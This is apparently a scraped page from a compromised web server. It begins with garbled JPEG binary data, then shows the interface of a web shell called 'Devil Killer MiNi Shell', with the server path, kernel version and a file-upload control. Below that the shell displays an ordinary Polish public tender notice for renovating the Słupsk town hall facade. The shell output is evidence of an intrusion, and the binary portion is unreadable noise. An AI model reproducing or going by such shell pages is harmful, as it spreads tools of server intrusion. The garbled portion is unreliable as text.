JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210615/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210615/0008298401-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00082984 z dnia 2021-06-15</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Renowacja części elewacji frontowej Ratusza Miejskiego w Słupsku </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto Słupsk</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 770979625</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Zwycięstwa 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Słupsk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">76-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL636 - Słupski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">59 8488367</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">59 8423583</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowieniapubliczne@um.slupsk.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://bip.um.slupsk.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Renowacja części elewacji frontowej Ratusza Miejskiego w Słupsku </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2a6237cd-cdb0-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00082984</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001241/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Renowacja części elewacji frontowej Ratusza Miejskiego w Słupsku.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://platformazakupowa.pl/pn/um_slupsk <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">http://platformazakupowa.pl/pn/um_slupsk</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Ofertę,<br/>oświadczenia o których mowa w art. 125 ust. 1 ustawy Pzp, podmiotowe środki dowodowe (jeśli<br/>dotyczy), w tym oświadczenie, o którym mowa w art. 117 ust. 4 ustawy, oraz zobowiązanie podmiotu<br/>udostępniającego zasoby, o którym mowa w art. 118 ust. 3 ustawy, zwane dalej „zobowiązaniem<br/>podmiotu udostępniającego zasoby”, przedmiotowe środki dowodowe (jeśli dotyczy), pełnomocnictwo<br/>sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach wydanych na<br/>podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących<br/>zadania publiczne (Dz. U. z 2020 r. poz. 346, 568, 695, 1517 i 2320), z zastrzeżeniem formatów, o<br/>których mowa w art. 66 ust. 1 ustawy, z uwzględnieniem rodzaju przekazywanych danych. 2.<br/>Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej opisane<br/>zostały w Regulaminie korzystania przesyłania dokumentów dostępnych pod adresem<br/>https://platformazakupowa.pl/strona/1-regulamin oraz Instrukcji dostępnej na stronie internetowej pod<br/>adresem: https://platformazakupowa.pl/strona/45-instrukcje 3. Wykonawca, przystępując do<br/>niniejszego postępowania o udzielenie zamówienia publicznego: a) akceptuje warunki korzystania z<br/>Platformy określone w Regulaminie zamieszczonym na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/1-regulamin w zakładce „Regulamin" oraz uznaje go za wiążący;b)<br/>zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod<br/>linkiemhttps://drive.google.com/file/d/1Kd1DttbBeiNWt4q4slS4t76lZVKPbkyD/view 4. Zamawiający nie<br/>ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją korzystania z Platformy w<br/>szczególności za sytuację, gdy Zamawiający zapozna się z treścią oferty przed upływem terminu<br/>składania ofert (np. złożenie oferty w zakładce „Wyślij wiadomość do Zamawiającego”). Taka oferta<br/>zostanie uznana przez Zamawiającego za ofertę handlową i nie będzie brana pod uwagę w<br/>przedmiotowym postępowaniu, ponieważ nie został spełniony obowiązek wymagany w art. 221 ustawy<br/>Prawo zamówień publicznych</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych<br/>wzwiązku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. U. UE L 119 z 4 maja<br/>2016, str. 1), dalej „RODO”, informuję, że: 1) administratorem Pani/Pana danych osobowych<br/>jestPrezydent Miasta Słupska, Plac Zwycięstwa 3, 76-200 Słupsk; 2) inspektor ochrony danych<br/>osobowych w Urzędzie Miejskim w Słupsku, kontakt: iod@um.slupsk.pl, telefon 59 84 88 459; 3)<br/>Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODOw celu związanym<br/>z przedmiotowym postępowaniem o udzielenie zamówienia publicznego, 4) odbiorcami Pani/Pana<br/>danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja<br/>postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 29 stycznia 2004 r. – Prawo<br/>zamówień publicznych (Dz. U. z 2019 r. poz. 2019 z późn. zm.), dalej „ustawa Pzp”; 5) Pani/Pana dane<br/>osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4 lat od dnia<br/>zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata,<br/>okres przechowywania obejmuje cały czas trwania umowy; 6) obowiązek podania przez Panią/Pana<br/>danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w<br/>przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego;<br/>konsekwencje niepodania określonych danychwynikają z ustawy Pzp; 7) w odniesieniu do Pani/Pana<br/>danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22<br/>RODO; 8) posiada Pani/Pan: a) na podstawie art. 15 RODO prawo dostępu do danych osobowych<br/>Pani/Pana dotyczących; b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych<br/>osobowych; c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia<br/>przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2<br/>RODO; d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna<br/>Pani/ Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO; 9)<br/>nie przysługuje Pani/Panu: a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych<br/>osobowych; b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; c) na<br/>podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą<br/>prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. 2. Administrator<br/>informuje, że wdraża odpowiednie środki techniczne i organizacyjne, takie jak pseudonimizacja,<br/>zaprojektowane w celu skutecznej realizacji zasad ochrony danych, takich jak minimalizacja danych<br/>oraz w celu nadania przetwarzaniu niezbędnych zabezpieczeń.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SRZP.271.12.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia są roboty budowlane części frontowej elewacji wraz z wybranymi<br/>elementami zabytkowego Ratusza Miejskiego w Słupsku przy Placu Zwycięstwa 3, szczegółowo<br/>opisane w załączonej dokumentacji projektowej, Specyfikacji Technicznej Wykonania i Odbioru<br/>Robót i opisie przedmiotu zamówienia. 1) Ratusz jest obiektem wpisanym do rejestru zabytków<br/>województwa pomorskiego pod poz. A-1158, zlokalizowany na działce 33 i 127, obręb 6. 2) Do<br/>remontu należy stosować materiały odpowiadające wymaganiom aktualnych norm bądź<br/>wymaganiom podanym w aprobatach (świadectwach) wydanych przez Instytut Techniki<br/>Budowlanej. Każda partia materiałów powinna być dostarczona na budowę z kopią certyfikatu<br/>stwierdzającą zgodność właściwości technicznych z wymaganiami podanymi w normach lub<br/>aprobatach.2. Zakres robót obejmuje: 1) czyszczenie ścian i okapów, 2) wymianę elementów<br/>uszkodzonych, 3) naprawę ścian, 4) remont stolarki okiennej, 5) wymianę stolarki okiennej, 6)<br/>renowację herbów w technice mozaiki, 7) renowację metalowych kandelabrów, 8) renowację<br/>herbu miasta Słupska znajdującego się po prawej stronie wieży. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45210000-2 - Roboty budowlane w zakresie budynków</p> <p class="mb-0">45212350-4 - Budynki o szczególnej wartości historycznej lub architektonicznej</p> <p class="mb-0">45321000-3 - Izolacja cieplna</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <p class="mb-0">45453100-8 - Roboty renowacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-12-22</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje możliwość udzielenia, w okresie trzech lat od dnia udzielenia<br/>zamówienia podstawowego, dotychczasowemu wykonawcy robót budowlanych, zamówienia<br/>polegającego na powtórzeniu podobnych robót budowlanych, w wysokości 30% zamówienia<br/>podstawowego tj. robót polegających na: 1) Czyszczenie ścian i okapów. 2) Wymiana elementów<br/>uszkodzonych elewacji. 3) Naprawa ścian. 4) Remont i czyszczenie stolarki okiennej. 5) Izolacja<br/>powłok. 6) Prace rozbiórkowe. 7) Roboty tynkarskie. 8) Renowacja detali architektonicznych. 9)<br/>Malowanie. 10) Obróbki blacharskie. 11) Układanie płytek ceramicznych. 12) Roboty murarskie. 13)<br/>Roboty dekarskie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający dokona wyboru oferty najkorzystniejszej na podstawie<br/>kryteriów oceny oferti ich znaczenia (wagi). 2. Kryteria oceny ofert: 1) Cena (C), znaczenie (waga): 60<br/>%, tj. max. 60 pkt.Zamawiający dokona oceny ofert za pomocą systemu punktowego, przy czym<br/>maksymalną liczbę punktów w ramach niniejszego kryterium (60 punktów) otrzyma Wykonawca, który<br/>zaproponuje najniższą całkowitą cenę brutto za przedmiot zamówienia, natomiast pozostali<br/>Wykonawcy otrzymają odpowiednio mniejszą liczbę punktów zgodnie z poniższym wzorem:cena<br/>najniższa brutto C = ----------------------------------------------- x 60 % x 100 pktcena oferty badanej brutto 2)<br/>Okres gwarancji (G), znaczenie (waga): 40 %, tj. max 40 pkt. .Ocena punktowa w kryterium Okres<br/>gwarancji dokonana zostanie na podstawie zadeklarowania przez Wykonawcę okresu gwarancji - w<br/>wymiarze: 24 miesięcy – 0 pkt; 36 miesięcy – 20 pkt; 48 miesięcy i więcej – 40 pkt. Zamawiającywymaga, aby minimalny okres gwarancji wynosił 24 miesiące. W przypadku, gdy Wykonawca wskaże<br/>w ofercie okres gwarancji krótszy niż 24 miesiące – oferta zostanie odrzucona. W przypadku, gdy<br/>Wykonawca zaoferuje okres gwarancji dłuższy niż 48 miesięcy, ocenie będzie podlegał okres 48<br/>miesięcy. W przypadku kiedy Wykonawca w Formularzu oferty nie wskaże żadnego okresu gwarancji -<br/>Zamawiający przyjmie, że Wykonawca oferuje minimalny okres gwarancji (tj. 24 miesiące) i w takim<br/>wypadku przyzna Wykonawcy 0 pkt. 3. Łączna ocena oferty jest sumą punków uzyskanych w<br/>poszczególnych kryteriachz uwzględnieniem wagi tych kryteriów i nie może przekraczać 100<br/>punktów:POFERTY = C + G < 100 4. Punkty liczone będą z dokładnością do dwóch miejsc po<br/>przecinku. W przypadku ofert z taką samą ilością punktów, zamawiający wybiera spośród tych ofert<br/>ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze. 1) Jeżeli oferty otrzymały<br/>taką samą ocenę w kryterium o najwyższej wadze, zamawiający wybiera ofertę z najniższą ceną lub<br/>najniższym kosztem. 2) Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa w ust. 1<br/>zamawiający wzywa wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez<br/>zamawiającego ofert dodatkowych zawierających nową cenę lub koszt. 5. Ofertą najkorzystniejszą jest<br/>oferta, która uzyska najwyższą liczbę punktów. 6. Zamawiający udzieli zamówienia Wykonawcy,<br/>którego oferta odpowiadać będzie wszystkim wymaganiom przedstawionym w ustawie Pzp, oraz w<br/>SWZ i zostanie oceniona jako najkorzystniejsza w oparciu o podane kryteria wyboru. 7. Oferty, które<br/>nie będą spełniały warunków niniejszej specyfikacji zostaną odrzucone.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1) w zakresie zdolności do występowania w obrocie gospodarczym:Zamawiający nie stawia<br/>warunków w tym zakresie.2) w zakresie uprawnień do prowadzenia określonej działalności<br/>gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:Zamawiający nie stawia<br/>warunków w tym zakresie.3) w zakresie sytuacji ekonomicznej lub finansowej:Zamawiający<br/>wymaga, aby Wykonawca był ubezpieczony od odpowiedzialności cywilnej w zakresie<br/>prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na sumę<br/>gwarancyjną nie mniejszą niż 250.000,00 zł brutto (słownie: dwieście pięćdziesiąt tysięcy złotych<br/>00/100).4) w zakresie zdolności technicznej lub zawodowej:Wykonawca spełni warunek jeżeli<br/>wykaże, że: a) należycie wykonał w okresie ostatnich pięciu lat przed upływem terminu składania<br/>ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie: - co najmniej dwie<br/>roboty budowlane o łącznej wartości nie mniejszej niż 250 000,00 zł, polegające na wykonaniu<br/>renowacji budynku będącym zabytkiem wpisanym do rejestru lub ewidencji zabytków, zgodnie<br/>ze sztuką budowlaną i prawidłowo je ukończył. Roboty budowlane stanowiące renowację<br/>budynku zabytkowego obejmują elewację, a więc wszystkie składowe jej części (elewację, drzwi,<br/>okna, detale architektoniczne, gzymsy itp.) oraz - co najmniej jedną robotę budowlaną<br/>polegającą na wykonaniu renowacji herbów bądź innych detali architektonicznych w technice<br/>mozaiki w budynku będącym zabytkiem wpisanym do rejestru lub ewidencji zabytków, zgodnie<br/>ze sztuką budowlaną i prawidłowo ją ukończył b) skieruje: minimum jedną osobę do wykonania<br/>zamówienia publicznego w zakresie kierowania robotami budowlanymi, która będzie<br/>uczestniczyć w wykonaniu zamówienia, posiadającą zgodnie z ustawą z dnia 7 lipca 1994 r. –<br/>Prawo budowlane (Dz. U. z 2020 r., poz.1333), uprawnienia budowlane bez ograniczeń do<br/>kierowania robotami budowlanymi o specjalności konstrukcyjno – budowlanej lub inne<br/>uprawnienia umożliwiające wykonywanie tych samych czynności, do wykonywania których w<br/>aktualnym stanie prawnym uprawniają uprawnienia budowlane w tej specjalności oraz która<br/>odbyła co najmniej 2-letnią praktykę zawodową na budowie przy zabytkach nieruchomych, o<br/>której mowa w § 12 Rozporządzenia Ministra Kultury i Dziedzictwa Narodowego w sprawie<br/>prowadzenia prac konserwatorskich, prac restauratorskich i badań konserwatorskich przy<br/>zabytku wpisanym do rejestru zabytków albo na Listę Skarbów Dziedzictwa oraz robót<br/>budowlanych, badań architektonicznych i innych działań przy zabytku wpisanym do rejestru<br/>zabytków, a także badań archeologicznych i poszukiwań zabytków (Dz.U. 2021 poz. 81) <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenia Wykonawcy, zwane dalej „Oświadczeniami”, których wzór określa załącznik nr 3 i<br/>załącznik nr 4 do SWZ, Informacje zawarte w oświadczeniu będą stanowić wstępne potwierdzenie,<br/>że wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu.2) W przypadku<br/>wspólnego ubiegania się o zamówienie przez Wykonawców „Oświadczenia”, o których mowa w ust. 1<br/>składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te mają<br/>potwierdzać spełnianie warunków udziału w postępowaniu, brak podstaw wykluczenia w zakresie, w<br/>którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu, brak podstaw<br/>wykluczenia.3) Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania braku<br/>istnienia wobec nich podstaw wykluczenia oraz spełnienia - w zakresie, w jakim powołuje się na ich<br/>zasoby - warunków udziału w postępowaniu zamieszcza informacje o tych podmiotach w Załączniku Nr<br/>3 do SWZ.4) W przypadku, gdy Wykonawca polega na zasobach podmiotu trzeciego na zasadach<br/>określonych w art. 118 ustawy Pzp wraz z ofertą składa dowody dysponowania zasobami, w<br/>szczególności zobowiązanie innego podmiotu do oddania do dyspozycji Wykonawcy niezbędnych<br/>zasobów na potrzeby realizacji zamówienia a także oświadczenie podmiotu udostępniającego zasoby,<br/>potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków<br/>udziału w postępowaniu w zakresie, w jakim Wykonawca powołuje się na jego zasoby.5) odpis z<br/>właściwego rejestru lub 